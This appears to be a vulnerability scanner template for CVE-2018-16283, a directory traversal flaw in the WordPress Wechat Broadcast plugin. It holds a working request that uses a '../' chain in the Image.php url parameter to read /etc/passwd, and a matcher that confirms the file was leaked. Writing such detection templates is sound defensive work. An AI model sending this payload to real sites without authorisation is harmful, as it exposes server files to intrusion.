id: CVE-2018-16283 info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu severity: critical description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. reference: - https://www.exploit-db.com/exploits/45438 - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 - http://seclists.org/fulldisclosure/2018/Sep/32 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 tags: cve,cve2018,wordpress,wp-plugin,lfi requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" matchers: - type: regex regex: - "root:.*:0:0:" part: body # Enhanced by mp on 2022/04/26